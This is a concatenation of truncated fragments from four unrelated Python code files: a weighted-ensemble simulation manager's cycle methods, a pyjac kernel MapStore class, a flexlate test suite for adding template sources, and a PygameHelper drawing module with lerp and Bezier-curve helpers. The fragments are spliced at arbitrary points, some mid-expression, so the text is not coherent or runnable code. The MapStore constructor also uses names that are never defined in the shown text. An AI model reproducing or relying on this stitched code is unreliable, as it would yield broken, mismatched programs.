Maps the work for running each segment for each walker using
the work mapper.
Walkers will have the same weights but different states.
Parameters
----------
walkers : list of walkers
segment_length : int
Number of steps to run in each segment.
Returns
-------
new_walkers : list of walkers
The walkers after the segment of sampling simulation.
"""
num_walkers = len(walkers)
logging.info("Starting segment")
try:
new_walkers = list(self.work_mapper.map(
# args, which must be supported by the map function
walkers,
(segment_length for i in range(num_walkers)),
# kwargs which are optionally recognized by the map function
cycle_idx=(cycle_idx for i in range(num_walkers)),
walker_idx=(walker_idx for walker_idx in range(num_walkers)),
)
)
except Exception as exception:
# get the errors from the work mapper error queue
self.cleanup()
# report on all of the errors that occured
raise exception
logging.info("Ending segment")
return new_walkers
def run_cycle(self, walkers, n_segment_steps, cycle_idx):
"""Run a full cycle of weighted ensemble simulation using each
component.
The order of application of wepy components are:
- runner
- boundary_conditions
- resampler
- reporters
The `init` method should have been called before this or
components may fail.
This method is not idempotent and will alter the state of wepy
components.
The cycle is not kept as a state variable of the simulation
manager and so myst be provided here. This motivation for this
is that a cycle index is really a property of a run and runs
can be composed in many ways and is then handled by
higher-level methods calling run_cycle.
Each component should implement its respective interface to be
called in this method, the order and names of the methods
called are as follows:
1. runner.pre_cycle
2. run_segment -> work_mapper.map(runner.run_segment)
3. runner.post_cycle
4. boundary_conditions.warp_walkers (if present)
5. resampler.resample
6. reporter.report for all reporters
The pre and post cycle calls to the runner allow for a parity
of one call per cycle to the runner.
The boundary_conditions component is optional, as are the
reporters (although it won't be very useful to run this
without any).
Parameters
----------
walkers : list of walkers
n_segment_steps : int
Number of steps to run in each segment.
cycle_idx : int
The index of this cycle.
Returns
-------
new_walkers : list of walkers
The resulting walkers of the cycle
sim_components : list
The runner, resampler, and boundary conditions
objects at the end of the cycle.
See Also
--------
run_simulation : To run a simulation by the number of cycles
run_simulation_by_time
"""
# this one is called to just easily be able to catch all the
# errors from it so we can cleanup if an error is caught
return self._run_cycle(walkers, n_segment_steps, cycle_idx)
def _run_cycle(self, walkers, n_segment_steps, cycle_idx):
"""See run_cycle."""
logging.info("Begin cycle {}".format(cycle_idx))
# run the pre-cycle hook
self.runner.pre_cycle(walkers=walkers,
n_segment_steps=n_segment_steps,
cycle_idx=cycle_idx)
# run the segment
start = time.time()
logging.info("Entering run segment")
new_walkers = self.run_segment(walkers, n_segment_steps, cycle_idx)
end = time.time()
runner_time = end - start
logging.info("Starting post cycle")
# run post-cycle hook
self.runner.post_cycle()
logging.info("End cycle {}".format(cycle_idx))
# boundary conditions should be optional;
# initialize the warped walkers to the new_walkers and
# change them later if need be
warped_walkers = new_walkers
warp_data = []
bc_data = []
progress_data = {}
bc_time = 0.0
if self.boundary_conditions is not None:
# apply rules of boundary conditions and warp walkers through space
start = time.time()
logging.info("Starting boundary conditions")
bc_results = self.boundary_conditions.warp_walkers(new_walkers,
cycle_idx)
end = time.time()
bc_time = end - start
# warping results
warped_walkers = bc_results[0]
warp_data = bc_results[1]
bc_data = bc_results[2]
progress_data = bc_results[3]
if len(warp_data) > 0:
logging.info("Returned warp record in cycle {}".format(cycle_idx))
# resample walkers
start = time.time()
logging.info("Starting resampler")
resampling_results = self.resampler.resample(warped_walkers)
end = time.time()
resampling_time = end - start
resampled_walkers = resampling_results[0]
resampling_data = resampling_results[1]
resampler_data = resampling_results[2]
# log the weights of the walkers after resampling
result_template_str = "|".join(["{:^5}" for i in range(self.n_init_walkers + 1)])
walker_weight_str = result_template_str.format("weight",
*[round(walker.weight, 3) | |
i, f in enumerate(found):
if f is not None:
parents[missing_inds[i]] = f
return parents
class domain_transform(object):
"""
Simple helper class to keep track of transform variables to test for
equality
"""
def __init__(self, mapping, affine):
self.mapping = mapping
self.affine = affine
def __eq__(self, other):
return self.mapping == other.mapping and self.affine == other.affine
class MapStore(object):
"""
This class manages maps and masks for inputs / outputs in kernels
Attributes
----------
loopy_opts : :class:`LoopyOptions`
The loopy options for kernel creation
map_domain : :class:`creator`
The domain of the iname to use for a mapped kernel
is_unit_test : bool
If true, we are generating arrays for a unit-test, and hence we should not
convert anything to working-buffer form
iname : str
The loop index to work with
have_input_map : bool
If true, the input map domain needs a map for expression
transformed_domains : set of :class:`tree_node`
The nodes that have required transforms
transform_insns : set
A set of transform instructions generated for this :class:`MapStore`
raise_on_final : bool
If true, raise an exception if a variable / domain is added to the
domain tree after this :class:`MapStore` has been finalized
working_buffer_index : bool
If True, use internal buffers for OpenCL/CUDA/etc. array creation
where possible. If False, use full sized arrays.
"""
def __init__(self, loopy_opts, map_domain, test_size, iname='i',
raise_on_final=True):
self.loopy_opts = loopy_opts
self.map_domain = map_domain
self._check_is_valid_domain(self.map_domain)
self.domain_to_nodes = {}
self.is_unit_test = isinstance(test_size, int)
self.transformed_domains = set()
self.tree = tree_node(self, self._get_base_domain(), iname=iname)
self.domain_to_nodes[self._get_base_domain()] = self.tree
from pytools import UniqueNameGenerator
self.taken_transform_names = UniqueNameGenerator(set([iname]))
self.iname = iname
self.have_input_map = False
self.raise_on_final = raise_on_final
self.is_finalized = False
self.working_buffer_index = None
self.reshape_to_working_buffer = False
# if we're using a pre-split, find the WBI
if self.loopy_opts.pre_split:
from pyjac.kernel_utils.kernel_gen import kernel_generator
specialization = kernel_generator.apply_specialization(
self.loopy_opts, var_name, None,
get_specialization=True)
global_index = next((k for k, v in six.iteritems(specialization)
if v == 'g.0'), global_ind)
self.working_buffer_index = global_index
# unit tests operate on the whole array
self.initial_condition_dimension = None
if not self.is_unit_test:
self.initial_condition_dimension = \
self.loopy_opts.initial_condition_dimsize
def _is_map(self):
"""
Return true if map kernel
"""
return True
@property
def transform_insns(self):
return set(val.insn for val in
self.transformed_domains if val.insn)
def _add_input_map(self):
"""
Adds an input map, and remakes the base domain
"""
# copy the base map domain
new_creator_name = self.map_domain.name + '_map'
new_map_domain = self.map_domain.copy()
# update new domain
new_map_domain.name = new_creator_name
new_map_domain.initializer = \
np.arange(self.map_domain.initializer.size, dtype=kint_type)
# change the base of the tree
new_base = tree_node(self, new_map_domain, iname=self.iname,
children=self.tree)
# and parent
# to maintain consistency/sanity, we always consider the original tree
# the 'base', even if the true base is being replaced
# This will be accounted for in :meth:`finalize`
self.tree.parent = new_base
# reset iname
self.tree.iname = None
# update domain
self.map_domain = new_map_domain
# and finally set tree
self.domain_to_nodes[new_map_domain] = new_base
# finally, check the tree's offspring. If they can be moved to the
# new base without mapping, do so
for child in list(self.tree.children):
if not child.is_leaf():
mapping, affine = self._get_map_transform(
new_map_domain, child.domain)
if not mapping:
# set parent
child.parent = new_base
# remove from old parent's child list
self.tree.children.remove(child)
# and add to new parent's child list
new_base.children.add(child)
self.have_input_map = True
@property
def absolute_root(self):
"""
Returns the :class:`MapStore`'s :attr:`tree`, if the store has no input map,
else the parent of the tree
A convenience method to get the true root of the tree
"""
return self.tree.parent if self.have_input_map else self.tree
def _create_transform(self, node, transform, affine=None):
"""
Creates a transform from the :class:`tree_node` node based on
it's parent and any affine mapping supplied
Parameters
----------
node : :class:`tree_node`
The node to create a transform for
transform : :class:`domain_transform`
The domain transform to store the base iname in
affine : int or dict
An integer or dictionary offset
Returns
-------
new_iname : str
The iname created for this transform
transform_insn : str or None
The loopy transform instruction to use. If None, this is an
affine transformation that doesn't require a separate instruction
"""
assert node.parent is not None, (
'Cannot create a transform for node'
' {} without parent'.format(node.domain.name))
assert node.parent.iname, (
'Cannot create a transform starting from parent node'
' {}, as it has no assigned iname'.format(node.parent.domain.name))
# add the transformed inames, instruction and map
new_iname = self._get_transform_iname(self.iname)
# and use the parent's "iname" (i.e. with affine mapping)
# to generate the transform
transform_insn = self.generate_transform_instruction(
node.parent.iname, new_iname, map_arr=node.domain.name,
affine=affine
)
if affine:
# store this as the new iname instead of issuing a new instruction
new_iname = transform_insn
transform_insn = None
return new_iname, transform_insn
def _get_transform_iname(self, iname):
"""Returns a new iname"""
return self.taken_transform_names(iname)
def _get_mask_transform(self, domain, new_domain):
"""
Get the appropriate map transform between two given domains.
Most likely, this will be a numpy array, but it may be an affine
mapping
Parameters
----------
domain : :class:`creator`
The domain to map
new_domain: :class:`creator`
The domain to map to
Returns
-------
None if domains are equivalent
Affine `str` map if an affine transform is possible
:class:`creator` if a more complex map is required
"""
try:
dcheck = domain.initializer
except AttributeError:
dcheck = domain
try:
ncheck = new_domain.initializer
except AttributeError:
ncheck = new_domain
# check equal
if np.array_equal(dcheck, ncheck):
return None, None
# check for affine
dset = np.where(dcheck != -1)[0]
nset = np.where(ncheck != -1)[0]
# must be same size for affine
if dset.size == nset.size:
# in order to be an affine mask transform, the set values should be
# an affine transform
diffs = nset - dset
affine = diffs[0]
if np.all(diffs == affine):
# additionally, the affine mapped values should match the
# original ones
if np.array_equal(ncheck[nset], dcheck[dset]):
return new_domain, affine
return new_domain, None
def _get_map_transform(self, domain, new_domain):
"""
Get the appropriate map transform between two given domains.
Most likely, this will be a numpy array, but it may be an affine
mapping
Parameters
----------
domain : :class:`creator`
The domain to map
new_domain: :class:`creator`
The domain to map to
Returns
-------
new_domain : :class:`creator`
If not None, this is the mapping that must be used
- None if domains are equivalent
- `str` map if an affine transform is possible
- :class:`creator` if a more complex map is required
"""
try:
dcheck = domain.initializer
except AttributeError:
dcheck = domain
try:
ncheck = new_domain.initializer
except AttributeError:
ncheck = new_domain
# first, we need to make sure that the domains are the same size,
# non-sensical otherwise
if dcheck.shape != ncheck.shape:
# Can't use affine map on domains of differing sizes
return new_domain, None
# check equal
if np.array_equal(dcheck, ncheck):
return None, None
# check for affine map
if np.all(ncheck - dcheck == (ncheck - dcheck)[0]):
return new_domain, (ncheck - dcheck)[0]
# finally return map
return new_domain, None
def _get_transform(self, base, domain):
return self._get_map_transform(base, domain) if self._is_map()\
else self._get_mask_transform(base, domain)
def _check_is_valid_domain(self, domain):
"""Makes sure the domain passed is a valid :class:`creator`"""
assert domain is not None, 'Invalid domain'
assert isinstance(domain, creator), ('Domain'
' must be of type `creator`')
assert domain.name is not None, ('Domain must have initialized name')
assert domain.initializer is not None, (
'Cannot use non-initialized creator {} as domain!'.format(
domain.name))
def _is_contiguous(self, domain):
"""Returns true if domain can be expressed with a simple for loop"""
indicies = domain.initializer
return indicies[0] + indicies.size - 1 == indicies[-1]
def _check_create_transform(self, node):
"""
Checks and creates a transform between the node and the
parent node if necessary
Parameters
----------
node : :class:`tree_node`
The domain to check
Returns
-------
new_iname : str
The iname created for this transform
transform_insn : str or None
The loopy transform instruction to use. If None, this is an
affine transformation that doesn't require a separate instruction
transform : :class:`domain_transform`
The representation of the transform used, for equality testing
"""
domain = node.domain
# check to see if root
if node.parent is None:
return None, None, None
base = node.parent.domain
# if this node should be treated as | |
<gh_stars>0
import json
import os
from dataclasses import dataclass
from unittest.mock import patch
import appdirs
import pytest
from git import Head
from flexlate import branch_update
from flexlate.add_mode import AddMode
from flexlate.config import FlexlateConfig, FlexlateProjectConfig
from flexlate.constants import DEFAULT_MERGED_BRANCH_NAME, DEFAULT_TEMPLATE_BRANCH_NAME
from flexlate.exc import TemplateSourceWithNameAlreadyExistsException
from flexlate.ext_git import repo_has_merge_conflicts
from flexlate.template.base import Template
from flexlate.template.copier import CopierTemplate
from flexlate.template.types import TemplateType
from flexlate.transactions.transaction import FlexlateTransaction
from tests.config import GENERATED_FILES_DIR
from tests.fileutils import cookiecutter_one_generated_text_content
from tests.fixtures.git import *
from tests.fixtures.subdir_style import SubdirStyle, subdir_style
from tests.fixtures.template import *
from tests.fixtures.templated_repo import *
from tests.fixtures.add_mode import add_mode
from tests.fixtures.transaction import *
from tests.fs_checks import (
assert_template_source_cookiecutter_one_added_correctly,
assert_cookiecutter_one_applied_template_added_correctly,
)
from tests.gitutils import (
accept_theirs_in_merge_conflict,
assert_main_commit_message_matches,
)
def test_add_template_source_to_repo(
repo_with_placeholder_committed: Repo,
cookiecutter_one_template: CookiecutterTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_placeholder_committed
adder = Adder()
adder.add_template_source(
repo,
cookiecutter_one_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version="some version",
)
assert_template_source_cookiecutter_one_added_correctly(
cookiecutter_one_template, target_version="some version"
)
def test_add_template_source_with_existing_name_fails(
repo_with_cookiecutter_one_template_source: Repo,
copier_one_template: CopierTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source
adder = Adder()
with pytest.raises(TemplateSourceWithNameAlreadyExistsException):
adder.add_template_source(
repo,
copier_one_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
)
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_local_cookiecutter_applied_template_to_repo(
add_mode: AddMode,
repo_with_cookiecutter_one_template_source: Repo,
cookiecutter_one_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source
template = cookiecutter_one_template
adder = Adder()
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=GENERATED_REPO_DIR,
add_mode=add_mode,
no_input=True,
)
if add_mode == AddMode.USER:
config_dir = GENERATED_FILES_DIR
template_root = GENERATED_REPO_DIR.absolute()
elif add_mode == AddMode.PROJECT:
config_dir = GENERATED_REPO_DIR
template_root = Path(".")
elif add_mode == AddMode.LOCAL:
# Template has output in a subdir, so with
# local mode config will also be in the subdir
config_dir = GENERATED_REPO_DIR / "b"
template_root = Path("..")
else:
raise ValueError(f"unsupported add mode {add_mode}")
assert_cookiecutter_one_applied_template_added_correctly(
template, config_dir, template_root, add_mode
)
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_local_copier_output_subdir_applied_template_to_repo(
add_mode: AddMode,
repo_with_copier_output_subdir_template_source: Repo,
copier_output_subdir_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_copier_output_subdir_template_source
template = copier_output_subdir_template
adder = Adder()
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=GENERATED_REPO_DIR,
add_mode=add_mode,
no_input=True,
)
if add_mode == AddMode.USER:
config_dir = GENERATED_FILES_DIR
template_root = GENERATED_REPO_DIR.absolute()
elif add_mode == AddMode.PROJECT:
config_dir = GENERATED_REPO_DIR
template_root = Path(".")
elif add_mode == AddMode.LOCAL:
# Even though template has output in a subdir, with copier
# it all still renders at root in output
config_dir = GENERATED_REPO_DIR
template_root = Path(".")
else:
raise ValueError(f"unsupported add mode {add_mode}")
config_path = config_dir / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.applied_templates) == 1
at = config.applied_templates[0]
assert at.name == template.name
assert at.version == template.version
assert at.data == {"qone": "aone", "qtwo": "atwo"}
assert at.root == template_root
assert at.add_mode == add_mode
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_remote_cookiecutter_applied_template_to_repo(
add_mode: AddMode,
repo_with_remote_cookiecutter_template_source: Repo,
cookiecutter_remote_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_remote_cookiecutter_template_source
template = cookiecutter_remote_template
adder = Adder()
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=GENERATED_REPO_DIR,
add_mode=add_mode,
no_input=True,
)
if add_mode == AddMode.USER:
config_dir = GENERATED_FILES_DIR
template_root = GENERATED_REPO_DIR.absolute()
elif add_mode == AddMode.PROJECT:
config_dir = GENERATED_REPO_DIR
template_root = Path(".")
elif add_mode == AddMode.LOCAL:
config_dir = GENERATED_REPO_DIR / "abc"
template_root = Path("..")
else:
raise ValueError(f"unsupported add mode {add_mode}")
_assert_remote_cookiecutter_applied_correctly(
template, template_root, add_mode, config_dir=config_dir
)
template_sources_config_path = GENERATED_REPO_DIR / "flexlate.json"
ts_config = FlexlateConfig.load(template_sources_config_path)
assert len(ts_config.template_sources) == 1
source = ts_config.template_sources[0]
assert source.name == cookiecutter_remote_template.name
assert source.path == cookiecutter_remote_template.git_url
assert source.version == cookiecutter_remote_template.version
assert source.type == TemplateType.COOKIECUTTER
assert source.render_relative_root_in_output == Path("{{ cookiecutter.name }}")
assert source.render_relative_root_in_template == Path("{{ cookiecutter.name }}")
def _assert_remote_cookiecutter_applied_correctly(
template: Template,
template_root: Path,
add_mode: AddMode,
config_dir: Path = GENERATED_REPO_DIR,
):
config_path = config_dir / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.applied_templates) == 1
at = config.applied_templates[0]
assert at.name == template.name
assert at.version == template.version
assert at.data == {"name": "abc", "key": "value"}
assert at.root == template_root
assert at.add_mode == add_mode
def test_add_source_and_output_at_target_version(
repo_with_placeholder_committed: Repo,
cookiecutter_remote_version_one_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_placeholder_committed
template = cookiecutter_remote_version_one_template
adder = Adder()
adder.add_template_source(
repo,
template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version=COOKIECUTTER_REMOTE_VERSION_1,
)
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=GENERATED_REPO_DIR,
no_input=True,
add_mode=AddMode.PROJECT,
)
# Check for version 1 content
output_path = GENERATED_REPO_DIR / "abc" / "abc.txt"
assert output_path.read_text() == "value"
# Check for version 1 in configs
config_path = GENERATED_REPO_DIR / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.template_sources) == 1
ts = config.template_sources[0]
assert ts.version == COOKIECUTTER_REMOTE_VERSION_1
assert ts.target_version == COOKIECUTTER_REMOTE_VERSION_1
assert len(config.applied_templates) == 1
at = config.applied_templates[0]
assert at.version == COOKIECUTTER_REMOTE_VERSION_1
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_applied_template_to_subdir(
add_mode: AddMode,
subdir_style: SubdirStyle,
repo_with_cookiecutter_one_template_source: Repo,
cookiecutter_one_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source
template = cookiecutter_one_template
subdir = GENERATED_REPO_DIR / "subdir1" / "subdir2"
subdir.mkdir(parents=True)
adder = Adder()
if subdir_style == SubdirStyle.CD:
with change_directory_to(subdir):
adder.apply_template_and_add(
repo, template, add_output_transaction, add_mode=add_mode, no_input=True
)
elif subdir_style == SubdirStyle.PROVIDE_RELATIVE:
with change_directory_to(GENERATED_REPO_DIR):
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=subdir.relative_to(os.getcwd()),
add_mode=add_mode,
no_input=True,
)
elif subdir_style == SubdirStyle.PROVIDE_ABSOLUTE:
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=subdir.absolute(),
add_mode=add_mode,
no_input=True,
)
if add_mode == AddMode.LOCAL:
config_dir = subdir / "b"
template_root = Path("..")
elif add_mode == AddMode.PROJECT:
config_dir = GENERATED_REPO_DIR
template_root = subdir.relative_to(GENERATED_REPO_DIR)
elif add_mode == AddMode.USER:
config_dir = GENERATED_FILES_DIR
template_root = subdir.absolute()
else:
raise ValueError(f"unsupported add mode {add_mode}")
config_path = config_dir / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.applied_templates) == 1
at = config.applied_templates[0]
assert at.name == template.name
assert at.version == template.version
assert at.data == {"a": "b", "c": ""}
assert at.root == template_root
assert at.add_mode == add_mode
output_file_path = subdir / "b" / "text.txt"
assert output_file_path.read_text() == "b"
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_multiple_applied_templates_for_one_source(
add_mode: AddMode,
repo_with_cookiecutter_one_template_source: Repo,
cookiecutter_one_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source
template = cookiecutter_one_template
subdir = GENERATED_REPO_DIR / "subdir1" / "subdir2"
subdir.mkdir(parents=True)
adder = Adder()
with change_directory_to(GENERATED_REPO_DIR):
adder.apply_template_and_add(
repo, template, add_output_transaction, add_mode=add_mode, no_input=True
)
with change_directory_to(subdir):
adder.apply_template_and_add(
repo, template, add_output_transaction, add_mode=add_mode, no_input=True
)
@dataclass
class OutputOptions:
config_dir: Path
template_root: Path
render_root: Path
expect_num_applied_templates: int = 1
applied_template_index: int = 0
output_options: List[OutputOptions] = []
if add_mode == AddMode.LOCAL:
output_options.extend(
[
OutputOptions(GENERATED_REPO_DIR / "b", Path(".."), GENERATED_REPO_DIR),
OutputOptions(subdir / "b", Path(".."), subdir),
]
)
elif add_mode == AddMode.PROJECT:
output_options.extend(
[
OutputOptions(
GENERATED_REPO_DIR,
Path("."),
GENERATED_REPO_DIR,
expect_num_applied_templates=2,
),
OutputOptions(
GENERATED_REPO_DIR,
subdir.relative_to(GENERATED_REPO_DIR),
subdir,
expect_num_applied_templates=2,
applied_template_index=1,
),
]
)
elif add_mode == AddMode.USER:
output_options.extend(
[
OutputOptions(
GENERATED_FILES_DIR,
GENERATED_REPO_DIR.absolute(),
GENERATED_REPO_DIR,
expect_num_applied_templates=2,
),
OutputOptions(
GENERATED_FILES_DIR,
subdir.absolute(),
subdir,
expect_num_applied_templates=2,
applied_template_index=1,
),
]
)
else:
raise ValueError(f"unsupported add mode {add_mode}")
for output_option in output_options:
config_dir = output_option.config_dir
template_root = output_option.template_root
render_root = output_option.render_root
expect_num_applied_templates = output_option.expect_num_applied_templates
applied_template_index = output_option.applied_template_index
config_path = config_dir / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.applied_templates) == expect_num_applied_templates
at = config.applied_templates[applied_template_index]
assert at.name == template.name
assert at.version == template.version
assert at.data == {"a": "b", "c": ""}
assert at.root == template_root
assert at.add_mode == add_mode
output_file_path = render_root / "b" / "text.txt"
assert output_file_path.read_text() == "b"
def test_add_source_to_project_with_existing_outputs(
repo_with_cookiecutter_one_template_source_and_output: Repo,
cookiecutter_two_template: CookiecutterTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source_and_output
adder = Adder()
adder.add_template_source(
repo,
cookiecutter_two_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version="some version",
)
assert cookiecutter_one_generated_text_content(gen_dir=GENERATED_REPO_DIR) == "b"
source_config_path = GENERATED_REPO_DIR / "flexlate.json"
source_config = FlexlateConfig.load(source_config_path)
assert len(source_config.applied_templates) == 0
assert len(source_config.template_sources) == 2
source = source_config.template_sources[1]
assert source.name == cookiecutter_two_template.name
assert source.path == str(cookiecutter_two_template.path)
assert source.version == cookiecutter_two_template.version
assert source.type == TemplateType.COOKIECUTTER
assert source.target_version == "some version"
assert source.render_relative_root_in_output == Path("{{ cookiecutter.a }}")
assert source.render_relative_root_in_template == Path("{{ cookiecutter.a }}")
at_config_path = GENERATED_REPO_DIR / "b" / "flexlate.json"
at_config = FlexlateConfig.load(at_config_path)
assert len(at_config.applied_templates) == 1
def test_add_source_with_merge_conflicts_and_resolution(
repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation,
cookiecutter_one_template: CookiecutterTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation
adder = Adder()
def _resolve_conflicts_then_type_yes(prompt: str) -> bool:
assert repo_has_merge_conflicts(repo)
accept_theirs_in_merge_conflict(repo)
stage_and_commit_all(repo, "Manually resolve conflicts")
return True
with patch.object(branch_update, "confirm_user", _resolve_conflicts_then_type_yes):
adder.add_template_source(
repo,
cookiecutter_one_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version="some version",
)
assert_template_source_cookiecutter_one_added_correctly(
cookiecutter_one_template,
num_sources=2,
source_idx=1,
num_applied_templates=1,
target_version="some version",
)
def test_add_source_with_merge_conflicts_and_reject(
repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation,
cookiecutter_one_template: CookiecutterTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation
adder = Adder()
def _reject(prompt: str) -> bool:
return False
with patch.object(branch_update, "confirm_user", _reject):
adder.add_template_source(
repo,
cookiecutter_one_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version="some version",
)
config_path = GENERATED_REPO_DIR / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.template_sources) == 1
assert_main_commit_message_matches(
repo.commit().message, "Reformat flexlate config"
)
for branch_name in [DEFAULT_MERGED_BRANCH_NAME, DEFAULT_TEMPLATE_BRANCH_NAME]:
branch = repo.branches[branch_name] # type: ignore
branch.checkout()
assert_main_commit_message_matches(
repo.commit().message, "Update flexlate templates"
)
def test_add_output_with_merge_conflicts_and_resolution(
repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation: Repo,
cookiecutter_remote_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_remote_version_one_template_source_and_output_that_will_have_merge_conflict_on_flexlate_operation
template = cookiecutter_remote_template
adder = Adder()
def _resolve_conflicts_then_type_yes(prompt: str) -> bool:
assert repo_has_merge_conflicts(repo)
accept_theirs_in_merge_conflict(repo)
stage_and_commit_all(repo, "Manually resolve conflicts")
return True
subdir = GENERATED_REPO_DIR / "subdir"
subdir.mkdir()
with patch.object(branch_update, "confirm_user", _resolve_conflicts_then_type_yes):
with change_directory_to(subdir):
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
no_input=True,
)
_assert_remote_cookiecutter_applied_correctly(
template, Path(".."), AddMode.LOCAL, config_dir=subdir / "abc"
)
def test_add_project_config_with_git(repo_with_placeholder_committed: Repo):
repo = repo_with_placeholder_committed
adder = Adder()
adder.init_project_and_add_to_branches(repo)
for branch_name in [
"master",
DEFAULT_MERGED_BRANCH_NAME,
DEFAULT_TEMPLATE_BRANCH_NAME,
]:
branch: Head = repo.branches[branch_name] # type: ignore
branch.checkout()
config = FlexlateProjectConfig.load(
GENERATED_REPO_DIR / "flexlate-project.json"
)
assert len(config.projects) == 1
project = config.projects[0]
assert project.path == Path(".")
assert project.default_add_mode == AddMode.LOCAL
assert project.merged_branch_name == DEFAULT_MERGED_BRANCH_NAME
assert project.template_branch_name == DEFAULT_TEMPLATE_BRANCH_NAME
assert project.remote | |
<gh_stars>0
# MIT License
#
# Copyright (c) 2021 Emc2356
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
some drawing functions
"""
from typing import List, Union, Tuple, Sequence, Optional
from PygameHelper.utils.formulas import *
from PygameHelper.exceptions import *
from PygameHelper.constants import *
from PygameHelper.types import *
from functools import lru_cache
import pygame
from math import sin, cos, sqrt
# some of this functions are in classes for better organisation
_MISSING = object()
def lerp(start: Number, stop: Number, amount: Number) -> float:
"""
Calculates a number between two numbers at a specific increment
:param start: Number
:param stop: Number
:param amount: Number
:return: float
"""
if amount > 1 or amount < 0:
if amount > 1:
raise ValueError(f"amount in lerp function is bigger than 1")
if amount < 0:
raise ValueError(f"amount in lerp function is smaller than 0")
return amount * (stop - start) + start
class _SO: # shared object
vertexes_list: List[List[Tuple[int, int]]] = []
surfaces: List[Optional[pygame.surface.Surface]] = []
loc_00: pygame.math.Vector2 = pygame.math.Vector2()
list_prev_00: List[pygame.math.Vector2] = []
class Curves:
@staticmethod
def _quadratic(p1: CoordsType, p2: CoordsType, p3: CoordsType, t: Number) -> pygame.math.Vector2:
return pygame.math.Vector2(
lerp(lerp(p1[0], p2[0], t), lerp(p2[0], p3[0], t), t),
lerp(lerp(p1[1], p2[1], t), lerp(p2[1], p3[1], t), t)
)
@classmethod
def quadratic_bezier(
cls,
surface: pygame.surface.Surface,
p1: CoordsType,
p2: CoordsType,
p3: CoordsType,
delta: Number=0.03,
color: ColorType=WHITE,
width: Number=1
) -> pygame.Rect:
"""
Quadratic bezier curve (1 static, 1 control and 1 static point)
:param surface: pygame.surface.Surface
:param p1: CoordsType
:param p2: CoordsType
:param p3: CoordsType
:param delta: Union[int, float]
:param color: ColorType
:param width: Number
:return: pygame.Rect
"""
mul_am = int(1 / delta)
return lines(
surface,
color,
False,
[cls._quadratic(p1, p2, p3, t / mul_am) for t in range(0, mul_am + 1, 1)],
width
)
@classmethod
def bezier(
cls,
surface: pygame.surface.Surface,
p1: CoordsType,
p2: CoordsType,
p3: CoordsType,
p4: CoordsType,
delta: Number=0.03,
color: ColorType=WHITE,
width: Number=1
) -> pygame.Rect:
"""
it creates a bezier curve based on 4 points (1 static, 2 control points an 1 static) aka a cubic bezier
:param surface: pygame.surface.Surface
:param p1: CoordsType
:param p2: CoordsType
:param p3: CoordsType
:param p4: CoordsType
:param delta: Union[int, float]
:param color: ColorType
